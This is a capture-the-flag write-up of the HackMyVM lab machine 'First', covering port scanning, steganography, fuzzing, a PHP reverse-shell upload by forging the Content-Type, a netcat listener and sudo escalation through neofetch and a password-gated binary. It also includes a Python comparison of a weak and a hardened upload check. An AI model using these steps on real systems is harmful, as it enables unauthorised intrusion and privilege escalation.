NOTES ABOUT First
[ 2022-10-01 ] [ HackMyVM / First ] Status: Rooted
Skills: Port Scanning, FTP, Fuzzing, PHP Upload Bypass, Reverse Shell, Sudo
Tools: nmap, wfuzz, nc
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.13
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Aug 09 10:16 fifth
| drwxr-xr-x 2 0 0 4096 Aug 10 12:44 first
| drwxr-xr-x 2 0 0 4096 Aug 09 10:16 fourth
| drwxr-xr-x 2 0 0 4096 Aug 09 10:16 seccond
|_drwxr-xr-x 2 0 0 4096 Aug 09 10:16 third
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.0.2.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b8:57:5b:81:5a:78:1f:d6:ff:60:39:bb:32:a8:5d:cd (RSA)
| 256 65:8d:43:ec:63:77:d0:39:c0:1b:3e:40:d9:53:1e:ed (ECDSA)
|_ 256 0f:02:ac:df:e1:31:3c:b2:59:f6:b7:59:09:f1:ff:f8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
GETTING IN
$ ftp anonymous@10.0.2.13
Connected to 10.0.2.13.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
ftp> cd first
ftp> get first_Logo.jpg
local: first_Logo.jpg remote: first_Logo.jpg
$ stegseek first_Logo.jpg
$ cat first_Logo.jpg.out | base64 -d
Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first
$ echo "2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74" | xxd -r -p
/t0d0_l1st_f0r_f1r5t
WEB: http://10.0.2.13/t0d0_l1st_f0r_f1r5t/
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -r 5 --hc 404 http://10.0.2.13/t0d0_l1st_f0r_f1r5t/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.2.13/t0d0_l1st_f0r_f1r5t/FUZZ
Total requests: 5163
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000077: 200 12 L 34 W 348 Ch "upload.php"
SOURCE CODE (upload.php is based on this example): https://www.w3schools.com/php/php_file_upload.asp
UPLOADED php-reverse-shell.php BY CHANGING THE MIME TYPE (THE Content-Type SENT WITH THE FILE) TO AN IMAGE TYPE.
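The bypass works because a MIME-type check reads the Content-Type that the client itself puts in the multipart body. Added example (not code from the VM or from the W3Schools page; the shape of the weak check is assumed): the trusting check beside a hardened one that allowlists only the final extension, verifies magic bytes and assigns a server-generated name, run over constructed uploads.

```python
import secrets

# What the file really starts with is the only evidence worth checking; the
# Content-Type sent in the multipart body is chosen by the client.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
IMAGE_TYPES = {"image/jpeg", "image/png", "image/gif"}


def weak_check(filename, content_type, data):
    # Assumed shape of the flawed check: trusts $_FILES[...]["type"], which is
    # just the client-sent Content-Type, so any file passes once that is forged.
    return content_type in IMAGE_TYPES


def hardened_check(filename, content_type, data):
    """Return (accepted, stored_name, reason)."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # strip any path
    if "." not in name:
        return False, None, "no extension"
    ext = name.rsplit(".", 1)[1].lower()                   # LAST extension decides
    if ext not in MAGIC:
        return False, None, f".{ext} not in allowlist"
    if not data.startswith(MAGIC[ext]):                    # tuple: any magic for ext
        return False, None, "bytes do not match extension"
    if content_type not in IMAGE_TYPES:
        return False, None, "unexpected Content-Type"
    # Server-generated name: the client never controls the name written to disk.
    # Store it outside the web root, or in a directory with PHP execution disabled.
    return True, f"{secrets.token_hex(16)}.{ext}", "ok"


# Constructed uploads: (filename, client-sent Content-Type, leading bytes).
SAMPLES = {
    "logo": ("first_Logo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 12),
    # the bypass from the notes: PHP source with Content-Type forged to image/jpeg
    "forged_type": ("shell.php", "image/jpeg", b"<?php // stand-in for reverse shell ?>"),
    "double_ext": ("shell.jpg.php", "image/png", b"<?php // stand-in ?>"),
    "php_in_jpg": ("x.jpg", "image/jpeg", b"<?php // stand-in ?>"),
}


def evaluate(sample):
    """(weak verdict, hardened verdict) for one constructed upload."""
    f, ct, d = SAMPLES[sample]
    return weak_check(f, ct, d), hardened_check(f, ct, d)[0]
```

Only the real JPEG passes both checks; every PHP variant passes the weak check as soon as the Content-Type is forged and is rejected by the hardened one.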
ELEVATING PRIVILEGES
$ nc -lvnp 443
sudo -l
Matching Defaults entries for www-data on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on first:
(first : first) NOPASSWD: /bin/neofetch
echo "print_info() { /bin/bash; }" > /tmp/config.txt
sudo -u first /bin/neofetch --config /tmp/config.txt
id
uid=1000(first) gid=1000(first) groups=1000(first),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
sudo -l
Matching Defaults entries for first on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User first may run the following commands on first:
(ALL) NOPASSWD: /bin/secret
sudo /bin/secret
pass: asdjlksjdklajsdlk
correct, input command:bash
id
uid=0(root) gid=0(root) groups=0(root)
init 0